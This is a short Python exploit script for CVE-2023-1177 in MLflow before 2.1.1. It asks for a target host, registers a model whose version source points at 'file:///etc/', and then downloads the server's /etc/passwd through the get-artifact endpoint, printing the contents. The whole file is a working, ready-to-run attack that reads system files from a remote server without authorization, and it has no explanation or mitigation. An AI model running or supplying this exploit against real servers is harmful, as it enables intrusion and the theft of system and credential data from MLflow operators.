import requests
import os,sys
import uuid
import json
import time


#generating unique id
os.system("clear")
print("=  CVE-2023-1177  =\n  MLflow < 2.1.1  \n===================\n")
print ("Enter the IP or Hostname of the server:")
hostname_or_ip=input()
server=str(hostname_or_ip)
print ("Exploitation on: "+server)
time.sleep(2)

#Generate unique id for model name
name=str(uuid.uuid4())
print ("[+] Generated Unique model name: "+name)
time.sleep(1)

create_model_url = "http://"+server+"/ajax-api/2.0/mlflow/registered-models/create"
update_model_url = "http://"+server+"/ajax-api/2.0/mlflow/model-versions/create"
get_data_url = "http://"+server+"/model-versions/get-artifact?path=passwd&name="+name+"&version=1"

data = {"name":name}
payload = {"name":name,"source":"file:///etc/"}


#Create model
print ("[+] Creating model")
time.sleep(1)
response_create_model = requests.post(create_model_url,json=data)
if (response_create_model.status_code==200):
        print ("[+] Successful! ")
        time.sleep(2)

#Updating model
print ("[+] Updating model ")
time.sleep(1)
response_update_model = requests.post(update_model_url,json=payload)
if (response_update_model.status_code==200):
        print ("[+] Successful! ")
        time.sleep(2)


#Fething content of /etc/passwd file
print ("[+] Fetching content of /etc/passwd file")
time.sleep(1)
response_get_data = requests.get(get_data_url)
if (response_get_data.status_code==200):
        print ("[+] Success!")
        print(response_get_data.text)